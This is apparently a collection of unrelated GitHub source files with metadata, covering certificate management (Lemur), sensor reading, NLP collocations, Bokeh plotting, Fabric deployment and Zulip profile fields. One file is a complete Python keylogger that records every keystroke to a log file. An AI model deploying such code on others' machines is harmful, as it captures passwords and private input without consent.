        log_data["certificate_id"] = cert.id
        log_data["authority_id"] = cert.authority_id
        log_data["authority_name"] = authorities_get_by_id(cert.authority_id).name
        log_data["destination_names"] = destination_names
        current_app.logger.info(log_data)
        metrics.send("automatically_enable_autorotate_with_destination",
                     "counter", 1,
                     metric_tags={"certificate": log_data["certificate"],
                                  "certificate_id": log_data["certificate_id"],
                                  "authority_id": log_data["authority_id"],
                                  "authority_name": log_data["authority_name"],
                                  "destination_names": log_data["destination_names"]
                                  })
        cert.rotation = True
        database.update(cert)
@manager.command
def deactivate_entrust_certificates():
    """
    Attempt to deactivate test certificates issued by Entrust.

    Certificates are processed in batches of 10 with a 30 second pause between
    batches (Entrust rate limit). Successfully deactivated certificates are
    marked "revoked"; any other plugin response marks them "unknown".
    Per-certificate failures are logged and do not abort the run.
    """
    log_data = {
        "function": f"{__name__}.{sys._getframe().f_code.co_name}",
        "message": "Deactivating Entrust certificates"
    }
    certificates = get_all_valid_certs(['entrust-issuer'])
    entrust_plugin = plugins.get('entrust-issuer')
    for index, cert in enumerate(certificates):
        # Entrust enforces a 10 request per 30s rate limit. Fix: only sleep
        # between batches — the original also slept before the very first
        # request (index 0), wasting 30 seconds per run.
        if index and index % 10 == 0:
            sleep(30)
        try:
            response = entrust_plugin.deactivate_certificate(cert)
            cert.status = "revoked" if response == 200 else "unknown"
            log_data["valid"] = cert.status
            log_data["certificate_name"] = cert.name
            log_data["certificate_id"] = cert.id
            metrics.send(
                "certificate_deactivate",
                "counter",
                1,
                metric_tags={"status": log_data["valid"],
                             "certificate_name": log_data["certificate_name"],
                             "certificate_id": log_data["certificate_id"]},
            )
            current_app.logger.info(log_data)
            database.update(cert)
        except Exception as e:
            current_app.logger.info(log_data)
            capture_exception()
            current_app.logger.exception(e)
@manager.option("-c", "--commit", dest="commit", action="store_true", default=False, help="Persist changes.")
def disable_rotation_of_duplicate_certificates(commit):
log_data = {
"function": f"{__name__}.{sys._getframe().f_code.co_name}",
"message": "Disabling auto-rotate for duplicate certificates"
}
if commit:
print("[!] Running in COMMIT mode.")
authority_names = current_app.config.get("AUTHORITY_TO_DISABLE_ROTATE_OF_DUPLICATE_CERTIFICATES")
if not authority_names:
log_data["message"] = "Skipping task: No authorities configured"
current_app.logger.debug(log_data)
return
log_data["authorities"] = authority_names
days_since_issuance = current_app.config.get("DAYS_SINCE_ISSUANCE_DISABLE_ROTATE_OF_DUPLICATE_CERTIFICATES", None)
log_data["days_since_issuance"] = f"{days_since_issuance} (Ignored if none)"
authority_ids = []
invalid_authorities = []
for authority_name in authority_names:
authority = get_authority_by_name(authority_name)
if authority:
authority_ids.append(authority.id)
else:
invalid_authorities.append(authority_name)
if invalid_authorities:
log_data["warning"] = f"Non-existing authorities: {invalid_authorities}"
if not authority_ids:
log_data["message"] = "Skipping task: No valid authorities configured"
current_app.logger.error(log_data)
return
duplicate_candidate_certs = list_duplicate_certs_by_authority(authority_ids, days_since_issuance)
log_data["certs_with_serial_number_count"] = len(duplicate_candidate_certs)
current_app.logger.info(log_data)
skipped_certs = []
rotation_disabled_certs = []
unique_prefix = []
failed_certs = []
for duplicate_candidate_cert in duplicate_candidate_certs:
success, duplicates = process_duplicates(duplicate_candidate_cert,
skipped_certs,
rotation_disabled_certs,
unique_prefix,
commit
)
if not success:
for cert in duplicates:
failed_certs.append(cert.name)
metrics.send("disable_rotation_duplicates", "counter", 1,
metric_tags={"status": "failed", "certificate": cert.name}
)
# certs_with_serial_number_count + unique_cert_prefix_count should be equal to
# rotation_disabled_cert_count + rotation_disabled_cert_count + failed_to_determine_if_duplicate_count
log_data["message"] = "Summary of task run"
log_data["unique_cert_prefix_count"] = len(unique_prefix)
log_data["rotation_disabled_cert_count"] = len(rotation_disabled_certs)
log_data["certificate_with_no_change_count"] = len(skipped_certs)
log_data["failed_to_determine_if_duplicate_count"] = len(failed_certs)
current_app.logger.info(log_data)
def process_duplicates(duplicate_candidate_cert, skipped_certs, rotation_disabled_certs, processed_unique_prefix, commit):
    """
    Process duplicates with same prefix as duplicate_candidate_cert

    :param duplicate_candidate_cert: Name of the certificate which has duplicates
    :param skipped_certs: List of certificates which will continue to have rotation on (no change)
    :param rotation_disabled_certs: List of certificates for which rotation got disabled as part of this job
    :param processed_unique_prefix: List of unique prefixes to avoid rework
    :param commit: When False, run dry: rotation flags are computed but not persisted
    :return: Success - True or False; If False, set of duplicates which were not processed
    """
    name_without_serial_num = duplicate_candidate_cert.name[:duplicate_candidate_cert.name.rindex("-")]
    if name_without_serial_num in processed_unique_prefix:
        return True, None
    processed_unique_prefix.append(name_without_serial_num)
    prefix_to_match = name_without_serial_num + '%'
    certs_with_same_prefix = get_certificates_with_same_prefix_with_rotate_on(prefix_to_match)
    if len(certs_with_same_prefix) == 1:
        # this is the only cert with rotation ON, no further action needed
        skipped_certs.append(certs_with_same_prefix[0].name)
        metrics.send("disable_rotation_duplicates", "counter", 1,
                     metric_tags={"status": "skipped", "certificate": certs_with_same_prefix[0].name}
                     )
        return True, None
    skip_cert = False
    certs_to_stay_on_autorotate = []
    # Fix: initialize the fallback so it cannot be referenced while unbound
    # when no certificate name equals the bare prefix.
    fallback_cert_to_rotate = None
    for matching_cert in certs_with_same_prefix:
        if matching_cert.name == name_without_serial_num:
            # There exists a cert with name same as the prefix (most likely there will always be one)
            # Keep auto rotate on for this one if no cert has endpoint associated
            fallback_cert_to_rotate = name_without_serial_num
        if matching_cert.name == duplicate_candidate_cert.name:
            # Same cert, no need to compare
            continue
        # Even if one of the cert with same prefix has different details, skip this set of certs
        # it's safe to do so and this logic can be revisited
        if not is_duplicate(matching_cert, duplicate_candidate_cert):
            skip_cert = True
            break
        # Find certs with endpoint, auto-rotate needs to be on for these
        if matching_cert.endpoints:
            certs_to_stay_on_autorotate.append(matching_cert.name)
    if skip_cert:
        # Not reporting failure for skipping cert since they are not duplicates,
        # comparision is working as intended
        for skipped_cert in certs_with_same_prefix:
            skipped_certs.append(skipped_cert.name)
            metrics.send("disable_rotation_duplicates", "counter", 1,
                         metric_tags={"status": "skipped", "certificate": skipped_cert.name}
                         )
        return True, None
    # If no certificate has endpoint, pick fallback_cert_to_rotate or any one to allow one certificate to auto-rotate.
    if not certs_to_stay_on_autorotate:
        # Fix: append the certificate *name* — the membership test below compares
        # names, so appending the certificate object meant the fallback never
        # matched and every cert had rotation disabled.
        certs_to_stay_on_autorotate.append(
            fallback_cert_to_rotate if fallback_cert_to_rotate else certs_with_same_prefix[0].name
        )
    for matching_cert in certs_with_same_prefix:
        if matching_cert.name in certs_to_stay_on_autorotate:
            skipped_certs.append(matching_cert.name)
            metrics.send("disable_rotation_duplicates", "counter", 1,
                         metric_tags={"status": "skipped", "certificate": matching_cert.name}
                         )
        else:
            # disable rotation and update DB
            matching_cert.rotation = False
            if commit:
                database.update(matching_cert)
            rotation_disabled_certs.append(matching_cert.name)
            metrics.send("disable_rotation_duplicates", "counter", 1,
                         metric_tags={"status": "success", "certificate": matching_cert.name}
                         )
    return True, None
def is_duplicate(matching_cert, compare_to):
    """Return True when two certificates look like duplicates of each other.

    Two certificates are considered duplicates when the owner, SAN field,
    key type, validity dates (compared at day granularity), destination
    labels and domain names all match.
    """
    core_fields_match = (
        matching_cert.owner == compare_to.owner
        and matching_cert.san == compare_to.san
        and matching_cert.key_type == compare_to.key_type
        and matching_cert.not_before.date() == compare_to.not_before.date()
        and matching_cert.not_after.date() == compare_to.not_after.date()
    )
    if not core_fields_match:
        return False

    left_destinations = [destination.label for destination in matching_cert.destinations]
    right_destinations = [destination.label for destination in compare_to.destinations]
    # Compare both length and membership so duplicated labels still have to line up.
    if len(left_destinations) != len(right_destinations) or set(left_destinations) != set(right_destinations):
        return False

    left_sans = [domain.name for domain in matching_cert.domains]
    right_sans = [domain.name for domain in compare_to.domains]
    return len(left_sans) == len(right_sans) and set(left_sans) == set(right_sans)
@manager.option(
    "-e",
    "--exclude",
    dest="exclude_domains",
    action="append",
    default=[],
    help="Domains that should be excluded from check.",
)
@manager.option(
    "-eo",
    "--exclude-owners",
    dest="exclude_owners",
    action="append",
    default=[],
    help="Owners that should be excluded from check.",
)
@manager.option(
    "-c",
    "--commit",
    dest="commit",
    action="store_true",
    default=False,
    help="Persist changes.",
)
def identify_expiring_deployed_certificates(exclude_domains, exclude_owners, commit):
    """Identify deployed certificates that are close to expiry and persist the findings.

    Failures are captured and logged rather than propagated; a single
    status metric is emitted on both the success and the failure path.
    """
    try:
        identify_and_persist_expiring_deployed_certificates(exclude_domains, exclude_owners, commit)
    except Exception:
        capture_exception()
        current_app.logger.exception("Error identifying expiring deployed certificates", exc_info=True)
        metrics.send(
            "identify_expiring_deployed_certificates",
            "counter",
            1,
            metric_tags={"status": FAILURE_METRIC_STATUS},
        )
    else:
        metrics.send(
            "identify_expiring_deployed_certificates",
            "counter",
            1,
            metric_tags={"status": SUCCESS_METRIC_STATUS},
        )
@manager.command
def expiration_metrics(expiry_window):
    """
    Iterates over all certificates and emits a metric for the days remaining for a certificate to expire.
    This is used for building custom dashboards and alerts for certificate expiry.
    """
    try:
        print("Starting to publish metrics for time left until cert expirations")
        success, failure = send_certificate_expiration_metrics(expiry_window)
        print(
            f"Finished publishing metrics for time left until cert expirations! Sent: {success}"
        )
        status = SUCCESS_METRIC_STATUS
    except Exception:
        status = FAILURE_METRIC_STATUS
        capture_exception()
    # Emit the job-status metric on both paths.  Previously this call was
    # nested inside the except block, so the SUCCESS status assigned above
    # was computed but never reported.
    metrics.send(
        "expiration_metrics_job", "counter", 1, metric_tags={"status": status}
    )
|
{
"content_hash": "57f2340f75d2e08afabd57d95cb63eca",
"timestamp": "",
"source": "github",
"line_count": 1156,
"max_line_length": 209,
"avg_line_length": 36.28546712802768,
"alnum_prop": 0.5971487150145425,
"repo_name": "Netflix/lemur",
"id": "a6091ce55fc5103c0d359222131b5e3701e5c6a2",
"size": "41946",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "lemur/certificates/cli.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "2728"
},
{
"name": "Dockerfile",
"bytes": "2597"
},
{
"name": "HTML",
"bytes": "314713"
},
{
"name": "JavaScript",
"bytes": "15496"
},
{
"name": "Makefile",
"bytes": "3791"
},
{
"name": "Mako",
"bytes": "412"
},
{
"name": "Python",
"bytes": "1530505"
},
{
"name": "Shell",
"bytes": "2339"
}
],
"symlink_target": ""
}
|
"""
Copyright (c) 2015, Aman Deep
All rights reserved.
A simple keylogger witten in python for linux platform
All keystrokes are recorded in a log file.
The program terminates when grave key(`) is pressed
grave key is found below Esc key
"""
import pyxhook
# Path of the file keystrokes are appended to -- change this to your own
# log file's path before running.
log_file='/home/aman/Desktop/file.log'
# This function is called by pyxhook every time a key is pressed: it appends
# the key name to the log file and stops the hook when the grave key (`) is
# pressed.
def OnKeyPress(event):
    # Open-and-close per event via a context manager.  The original opened a
    # new handle on every keystroke but only closed the final one, leaking a
    # file descriptor per key press.
    with open(log_file, 'a') as fob:
        fob.write(event.Key)
        fob.write('\n')
    if event.Ascii == 96:  # 96 is the ascii value of the grave key (`)
        new_hook.cancel()
# Instantiate the pyxhook HookManager, which dispatches keyboard events.
new_hook=pyxhook.HookManager()
# Route every key-down event to the handler defined above.
new_hook.KeyDown=OnKeyPress
# Register the keyboard hook.
new_hook.HookKeyboard()
# Start the event loop; it runs until new_hook.cancel() is called from
# OnKeyPress (grave key pressed).
new_hook.start()
|
{
"content_hash": "5ace588611f96ce514264794c781b4e0",
"timestamp": "",
"source": "github",
"line_count": 34,
"max_line_length": 65,
"avg_line_length": 22.970588235294116,
"alnum_prop": 0.7413572343149808,
"repo_name": "hiamandeep/py-keylogger",
"id": "8a5d636a52ce2c75124eca2d09e0e578dbb56c65",
"size": "781",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "keylogger.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "16605"
}
],
"symlink_target": ""
}
|
from grovepi import *
from grove_rgb_lcd import *
# Grove port assignments and behavior tuning (Python 2 script).
dht_sensor_port = 7  # DHT temperature/humidity sensor on digital port 7
dht_sensor_type = 0  # sensor-type code passed to dht(); confirm meaning against GrovePi docs
ultrasonic_ranger = 4  # ultrasonic ranger on digital port 4
distance_threshold = 20  # only show the reading when something is at least this close
try:
    # Read temperature and humidity from the DHT sensor, then distance from
    # the ultrasonic ranger.
    (temp, hum) = dht(dht_sensor_port, dht_sensor_type)
    distance = ultrasonicRead(ultrasonic_ranger)
    if (distance <= distance_threshold):
        # Something is nearby: light the LCD green and show the reading.
        setRGB(0,255,0)
        setText("Temp: {:d}C Humidity : {:d}%".format(int(temp), int(hum)))
    else:
        # Nothing nearby: blank the display.
        setRGB(0,0,0)
        setText("")
    # Emit "temp#humidity" on stdout for whatever consumes this script.
    print "{:d}#{:d}".format(int(temp), int(hum))
except (IOError,TypeError) as e:
    print "Error"
    exit(0)
|
{
"content_hash": "9d61dd306fa60f72df642c20c98f45b8",
"timestamp": "",
"source": "github",
"line_count": 23,
"max_line_length": 81,
"avg_line_length": 24.26086956521739,
"alnum_prop": 0.6164874551971327,
"repo_name": "davidone/misc",
"id": "cf1e14541729aad77d949e37ed4afa3df5b8790d",
"size": "581",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "dht.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Makefile",
"bytes": "58"
},
{
"name": "Python",
"bytes": "2660"
},
{
"name": "Shell",
"bytes": "605"
}
],
"symlink_target": ""
}
|
from nltk.corpus import wordnet
import re
from .pos_tagger import POS_tag_cleaner
# Method to determine if a phrase is a collocation based on dictionary based technique
# Uses WordNet from NLTK corpus to obtain definitions of the words when both
# the word and it's sense are passed as inputs
def Collocations_Method_1(_n_grams_from_input_text_file, _input_file_path, _apply_POS_restrictions, _verbose):
    """Dictionary-based collocation extraction using WordNet.

    An n-gram phrase counts as a collocation when WordNet has at least one
    synset for the underscore-joined, POS-tag-stripped phrase.  When
    ``_apply_POS_restrictions`` is True, phrases containing none of the
    tags NN/VB/RB/JJ are rejected up front.

    Results are written to ``collocations_wordnet.txt`` and
    ``not_collocations_wordnet.txt`` next to the input file, and returned
    as the tuple (collocations, non_collocations).
    """
    if _verbose:
        # A file to save the verbose output of the program
        _output_file_verbose = str(_input_file_path).replace(_input_file_path.split('/')[-1], 'verbose.txt')
        _output_file_verbose = open(_output_file_verbose, 'a')
        print("\n--------------------------------------------------------------------------", file = _output_file_verbose)
        print("\tMethod-1: WordNet - Extracting collocations:", file = _output_file_verbose)
        print("--------------------------------------------------------------------------\n\n", file = _output_file_verbose)
    print("\tMethod-1: Using WordNet to extract collocations ...")
    # A list to store n-gram phrases that are collocations
    wordnet_collocations = []
    # A list to store n-gram phrases that are not collocations
    n_grams_not_collocations = []
    for _n_gram in _n_grams_from_input_text_file:
        if _verbose:
            print("\n%s:" %(_n_gram), file = _output_file_verbose)
        if _n_gram in wordnet_collocations or _n_gram in n_grams_not_collocations:
            # If a particular n-gram phrase is checked if it is a collocation before,
            # it will be present in one of the lists, wordnet_collocations OR n_grams_not_collocations
            # Hence, we move on to the next n-gram
            continue
        else:
            # Before checking if the n-gram is defined in WordNet we check if atleast one
            # POS tag is from the valid POS tag list: {Noun, Verb, Adverb, Adjective} if
            # _apply_POS_restrictions is set to True
            if _apply_POS_restrictions:
                valid_POS_tags = ['NN', 'VB', 'RB', 'JJ']
                _valid_POS_tag_counter = 0  # A counter to count the number of valid POS tags in n-gram
                for _pos_tag in valid_POS_tags:
                    if _pos_tag in _n_gram:
                        _valid_POS_tag_counter += 1
                if _valid_POS_tag_counter == 0:
                    # If no valid POS tag is present in the n-gram, it is not a collocation
                    # when POS restrictions are applied
                    n_grams_not_collocations.append(_n_gram)
                    if _verbose:
                        print("\t'%s' does not have valid POS tags\n\tMoving on to the next phrase ..." %(_n_gram), file = _output_file_verbose)
                    continue  # We move to the next n-gram in the list
            # Strip the "_TAG" POS suffixes, lower-case, and underscore-join the
            # words to form a WordNet lookup key.
            _n_gram_lower = _n_gram.lower() + ' '  # Lower case
            _n_gram_lower = re.sub(r'_.*? ', ' ', _n_gram_lower).rstrip(' ')
            _n_gram_lower = _n_gram_lower.replace(' ', '_')
            if _verbose:
                print("\tLooking for phrase definitions in WordNet ...", file = _output_file_verbose)
            syn_sets = wordnet.synsets(_n_gram_lower)
            if len(syn_sets) == 0:
                if _verbose:
                    print("\tWordNet does not have definitions for '%s'" %(_n_gram_lower), file = _output_file_verbose)
                n_grams_not_collocations.append(_n_gram)
                continue
            else:
                wordnet_collocations.append(_n_gram)
                if _verbose:
                    print("\tCOLLOCATION: '%s' is defined in WordNet" %(_n_gram_lower), file = _output_file_verbose)
                continue
    # Output text file to save collocations
    _output_file_path_wordnet_collocations = str(_input_file_path).replace(_input_file_path.split('/')[-1], 'collocations_wordnet.txt')
    with open(_output_file_path_wordnet_collocations, 'w') as _output_file_wordnet_collocations:
        for _collocation in wordnet_collocations:
            print(POS_tag_cleaner(_collocation) + '\n', file = _output_file_wordnet_collocations)
    if _verbose:
        print("\n\tMethod-1: WordNet - Collocations are written to the file:\n\t%s" %(_output_file_path_wordnet_collocations), file = _output_file_verbose)
    # Output text file to save n-grams that are not collocations.
    # (A redundant bare open() of the same path used to precede this `with`
    # statement, leaking an open handle; it has been removed.)
    _output_file_path_wordnet_not_collocations = str(_input_file_path).replace(_input_file_path.split('/')[-1], 'not_collocations_wordnet.txt')
    with open(_output_file_path_wordnet_not_collocations, 'w') as _output_file_wordnet_not_collocations:
        for _n_gram in n_grams_not_collocations:
            print(POS_tag_cleaner(_n_gram) + '\n', file = _output_file_wordnet_not_collocations)
    if _verbose:
        print("\n\tMethod-1: WordNet - N-grams that are not collocations are written to the file:\n\t%s" %(_output_file_path_wordnet_not_collocations), file = _output_file_verbose)
    if _verbose:
        print("\n--------------------------------------------------------------------------", file = _output_file_verbose)
        print("\tMethod-1: WordNet - Collocation extraction - Complete", file = _output_file_verbose)
        print("--------------------------------------------------------------------------\n\n", file = _output_file_verbose)
    # Returning n-grams that are collocations and n-grams that are not
    if _verbose:
        print("\t\tCollocation extraction - Method-1 - successful")
        # Close the verbose log that was opened at the top of the function.
        _output_file_verbose.close()
    return wordnet_collocations, n_grams_not_collocations
|
{
"content_hash": "a72f21ef6c16b67fa12b4b82d111a148",
"timestamp": "",
"source": "github",
"line_count": 93,
"max_line_length": 174,
"avg_line_length": 54.98924731182796,
"alnum_prop": 0.6576065701994525,
"repo_name": "shahryarabaki/ICE",
"id": "dc1e549c56bc117daf9afcc4cfc861cdef4f5893",
"size": "5114",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "src/collocations_method_1.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "427800"
}
],
"symlink_target": ""
}
|
import numpy as np
from bokeh.models import Button
from bokeh.palettes import RdYlBu3
from bokeh.plotting import figure, curdoc, vplot
# Create a black-on-black plot with fixed 0-100 axes and no toolbar.
p = figure(x_range=(0, 100), y_range=(0, 100), toolbar_location=None)
p.border_fill_color = 'black'
p.background_fill_color = 'black'
p.outline_line_color = None
p.grid.grid_line_color = None
# Add an (initially empty) red line renderer; points are appended to its
# data source by the button callback.
r = p.line(x=[], y=[], color="red")
i = 0  # next x coordinate to append
ds = r.data_source  # the data source backing the line renderer
# Button callback: extend the line with one new random-height point and
# notify Bokeh that the data source changed.
def callback():
    global i
    new_y = np.random.random() * 70 + 15
    ds.data['x'].append(i)
    ds.data['y'].append(new_y)
    ds.trigger('data', ds.data, ds.data)
    i += 1
# Add a button widget and wire its click event to the callback above.
button = Button(label="Press Me")
button.on_click(callback)
# Stack the button above the plot and register the layout with the current
# Bokeh document.
curdoc().add_root(vplot(button, p))
|
{
"content_hash": "42f59c6a6c9874dcea9c42544328abb9",
"timestamp": "",
"source": "github",
"line_count": 34,
"max_line_length": 69,
"avg_line_length": 27.176470588235293,
"alnum_prop": 0.698051948051948,
"repo_name": "ChinaBackGo/airmonitor",
"id": "dad4947f2f4409c099fd76007b14bd821f7fd8e6",
"size": "936",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "bokeh-scratch.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Arduino",
"bytes": "1038"
}
],
"symlink_target": ""
}
|
import time
from fabric.api import env, run
from fabric.context_managers import cd
from fabric.operations import get
# Remote host(s) Fabric will connect to.
env.hosts = ['login.osgconnect.net']
# Load the username and password from local files so credentials stay out
# of source control.
# NOTE(review): file.read() keeps any trailing newline -- confirm the
# credential files contain no newline, or strip() here.
with open('C:/gh/data2/username.txt','r') as myfile:
    env.user = myfile.read()
with open('C:/gh/data2/pw.txt','r') as myfile:
    env.password = myfile.read()
# Commands to execute on the remote server
def run_demo():
    """Run the OSG demo end-to-end on the remote host.

    Clones the demo repo, builds the virtualenv, stages the data set to
    stash, tars the analysis package, submits the Condor job, waits for it
    to finish, and downloads the output files locally.
    """
    run("git clone https://github.com/srcole/demo_OSG_python")
    with cd('demo_OSG_python'):
        run("chmod +x create_virtenv.sh")
        run("./create_virtenv.sh")
        # Remove the unpacked virtualenv after create_virtenv.sh has run.
        run("rm -R python_virtenv_demo")
        run("mv lfp_set/ /stash/user/"+env.user+"/lfp_set/")
        run("tar -cvzf misshapen.tar.gz misshapen")
        run("rm -R misshapen")
        run("mkdir Log")
        run("condor_submit sub_PsTs.submit")
        # Need to wait until done running; should be less than 5 minutes
        time.sleep(300)
        # Fetch the job's output files to the local machine.
        get("./out*")
|
{
"content_hash": "a7d492a78d5aa8690282eab1016d8624",
"timestamp": "",
"source": "github",
"line_count": 29,
"max_line_length": 72,
"avg_line_length": 34.44827586206897,
"alnum_prop": 0.6436436436436437,
"repo_name": "srcole/qwm",
"id": "2ac91e7be75b99d2ca688d34e4db25f2814be2ed",
"size": "1066",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "demo_OSG_python/fabfile.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "194088"
},
{
"name": "HTML",
"bytes": "1160166"
},
{
"name": "JavaScript",
"bytes": "261184"
},
{
"name": "Jupyter Notebook",
"bytes": "52628978"
},
{
"name": "Python",
"bytes": "34827"
},
{
"name": "Shell",
"bytes": "81"
}
],
"symlink_target": ""
}
|
from typing import Dict, Iterable, List, Optional, Union
import orjson
from django.db import transaction
from django.utils.translation import gettext as _
from zerver.lib.exceptions import JsonableError
from zerver.lib.external_accounts import DEFAULT_EXTERNAL_ACCOUNTS
from zerver.lib.streams import render_stream_description
from zerver.lib.types import ProfileDataElementUpdateDict, ProfileFieldData
from zerver.models import (
CustomProfileField,
CustomProfileFieldValue,
Realm,
UserProfile,
active_user_ids,
custom_profile_fields_for_realm,
)
from zerver.tornado.django_api import send_event
def notify_realm_custom_profile_fields(realm: Realm) -> None:
    """Broadcast the realm's current custom profile fields to all active users."""
    realm_fields = custom_profile_fields_for_realm(realm.id)
    event = dict(
        type="custom_profile_fields",
        fields=[field.as_dict() for field in realm_fields],
    )
    send_event(realm, event, active_user_ids(realm.id))
def try_add_realm_default_custom_profile_field(
    realm: Realm,
    field_subtype: str,
    display_in_profile_summary: bool = False,
) -> CustomProfileField:
    """Create one of the built-in external-account profile fields for a realm."""
    account_meta = DEFAULT_EXTERNAL_ACCOUNTS[field_subtype]
    field = CustomProfileField(
        realm=realm,
        name=str(account_meta.name),
        field_type=CustomProfileField.EXTERNAL_ACCOUNT,
        hint=account_meta.hint,
        field_data=orjson.dumps(dict(subtype=field_subtype)).decode(),
        display_in_profile_summary=display_in_profile_summary,
    )
    field.save()
    # The display order defaults to the row id, which is only known after
    # the first save; persist it with a second, narrow update.
    field.order = field.id
    field.save(update_fields=["order"])
    notify_realm_custom_profile_fields(realm)
    return field
def try_add_realm_custom_profile_field(
    realm: Realm,
    name: str,
    field_type: int,
    hint: str = "",
    field_data: Optional[ProfileFieldData] = None,
    display_in_profile_summary: bool = False,
) -> CustomProfileField:
    """Create a custom profile field for the realm and notify its users."""
    field = CustomProfileField(
        realm=realm,
        name=name,
        field_type=field_type,
        display_in_profile_summary=display_in_profile_summary,
    )
    field.hint = hint
    # Only SELECT and EXTERNAL_ACCOUNT fields carry structured field_data.
    if field.field_type in (CustomProfileField.SELECT, CustomProfileField.EXTERNAL_ACCOUNT):
        field.field_data = orjson.dumps(field_data or {}).decode()
    field.save()
    # The display order defaults to the row id, known only after the first save.
    field.order = field.id
    field.save(update_fields=["order"])
    notify_realm_custom_profile_fields(realm)
    return field
def do_remove_realm_custom_profile_field(realm: Realm, field: CustomProfileField) -> None:
    """
    Deleting a field will also delete the user profile data
    associated with it in CustomProfileFieldValue model.
    """
    # Presumably the value rows cascade from the field's foreign key (per the
    # docstring above) -- confirm against the model definitions.
    field.delete()
    notify_realm_custom_profile_fields(realm)
def do_remove_realm_custom_profile_fields(realm: Realm) -> None:
    """Delete every custom profile field defined for the realm."""
    CustomProfileField.objects.filter(realm=realm).delete()
def remove_custom_profile_field_value_if_required(
    field: CustomProfileField, field_data: ProfileFieldData
) -> None:
    """Delete stored values whose option keys are absent from the new field_data."""
    previous_options = set(orjson.loads(field.field_data).keys())
    dropped_options = previous_options.difference(field_data.keys())
    if dropped_options:
        CustomProfileFieldValue.objects.filter(field=field, value__in=dropped_options).delete()
def try_update_realm_custom_profile_field(
    realm: Realm,
    field: CustomProfileField,
    name: str,
    hint: str = "",
    field_data: Optional[ProfileFieldData] = None,
    display_in_profile_summary: bool = False,
) -> None:
    """Update an existing custom profile field and broadcast the change."""
    field.name = name
    field.hint = hint
    field.display_in_profile_summary = display_in_profile_summary
    # Only SELECT and EXTERNAL_ACCOUNT fields carry structured field_data.
    if field.field_type in (CustomProfileField.SELECT, CustomProfileField.EXTERNAL_ACCOUNT):
        if field.field_type == CustomProfileField.SELECT:
            assert field_data is not None
            # Removing a SELECT option must also drop values users had
            # chosen for it.
            remove_custom_profile_field_value_if_required(field, field_data)
        field.field_data = orjson.dumps(field_data or {}).decode()
    field.save()
    notify_realm_custom_profile_fields(realm)
def try_reorder_realm_custom_profile_fields(realm: Realm, order: Iterable[int]) -> None:
    """Reorder the realm's custom profile fields to match the given id order.

    Raises JsonableError if any of the realm's fields is missing from
    ``order``.
    """
    # Map field id -> desired position.  (The original comprehension bound
    # its loop variable to ``_``, shadowing the gettext alias imported at
    # the top of this module and used just below.)
    order_mapping = {field_id: position for position, field_id in enumerate(order)}
    custom_profile_fields = CustomProfileField.objects.filter(realm=realm)
    # Validate the full mapping before mutating anything, so an invalid
    # request leaves the ordering untouched.
    for custom_profile_field in custom_profile_fields:
        if custom_profile_field.id not in order_mapping:
            raise JsonableError(_("Invalid order mapping."))
    for custom_profile_field in custom_profile_fields:
        custom_profile_field.order = order_mapping[custom_profile_field.id]
        custom_profile_field.save(update_fields=["order"])
    notify_realm_custom_profile_fields(realm)
def notify_user_update_custom_profile_data(
    user_profile: UserProfile, field: Dict[str, Union[int, str, List[int], None]]
) -> None:
    """Send a realm_user update event describing one changed profile field value."""
    data = dict(id=field["id"], value=field["value"])
    rendered = field["rendered_value"]
    if rendered:
        data["rendered_value"] = rendered
    person = dict(user_id=user_profile.id, custom_profile_field=data)
    event = dict(type="realm_user", op="update", person=person)
    send_event(user_profile.realm, event, active_user_ids(user_profile.realm.id))
def do_update_user_custom_profile_data_if_changed(
    user_profile: UserProfile,
    data: List[ProfileDataElementUpdateDict],
) -> None:
    """Persist changed custom profile field values for a user and notify clients.

    Values that are unchanged are skipped entirely (no write, no event).
    All writes happen inside a single transaction, and one realm_user
    update event is sent per field whose value actually changed.
    """
    with transaction.atomic():
        for custom_profile_field in data:
            field_value, created = CustomProfileFieldValue.objects.get_or_create(
                user_profile=user_profile, field_id=custom_profile_field["id"]
            )

            # field_value.value is a TextField() so we need to have field["value"]
            # in string form to correctly make comparisons and assignments.
            if isinstance(custom_profile_field["value"], str):
                custom_profile_field_value_string = custom_profile_field["value"]
            else:
                custom_profile_field_value_string = orjson.dumps(
                    custom_profile_field["value"]
                ).decode()

            if not created and field_value.value == custom_profile_field_value_string:
                # If the field value isn't actually being changed to a different one,
                # we have nothing to do here for this field.
                continue
            field_value.value = custom_profile_field_value_string
            if field_value.field.is_renderable():
                field_value.rendered_value = render_stream_description(
                    custom_profile_field_value_string
                )
                field_value.save(update_fields=["value", "rendered_value"])
            else:
                field_value.save(update_fields=["value"])
            notify_user_update_custom_profile_data(
                user_profile,
                {
                    "id": field_value.field_id,
                    "value": field_value.value,
                    "rendered_value": field_value.rendered_value,
                    "type": field_value.field.field_type,
                },
            )
def check_remove_custom_profile_field_value(user_profile: UserProfile, field_id: int) -> None:
    """Delete the user's stored value for the given custom profile field.

    Raises JsonableError when no field with that id exists in the user's
    realm; silently succeeds when the field exists but the user has no
    stored value for it.
    """
    try:
        custom_profile_field = CustomProfileField.objects.get(realm=user_profile.realm, id=field_id)
        field_value = CustomProfileFieldValue.objects.get(
            field=custom_profile_field, user_profile=user_profile
        )
        field_value.delete()
        notify_user_update_custom_profile_data(
            user_profile,
            {
                "id": field_id,
                "value": None,
                "rendered_value": None,
                "type": custom_profile_field.field_type,
            },
        )
    except CustomProfileField.DoesNotExist:
        raise JsonableError(_("Field id {id} not found.").format(id=field_id))
    except CustomProfileFieldValue.DoesNotExist:
        # The user never set a value for this field; nothing to delete.
        pass
|
{
"content_hash": "b6c3b7f551006f706d6d5cefd2e5effd",
"timestamp": "",
"source": "github",
"line_count": 210,
"max_line_length": 100,
"avg_line_length": 38.24285714285714,
"alnum_prop": 0.6604407919312664,
"repo_name": "andersk/zulip",
"id": "7fb0ad31cf0b3bc31ca74324288aae3c9aecc5fd",
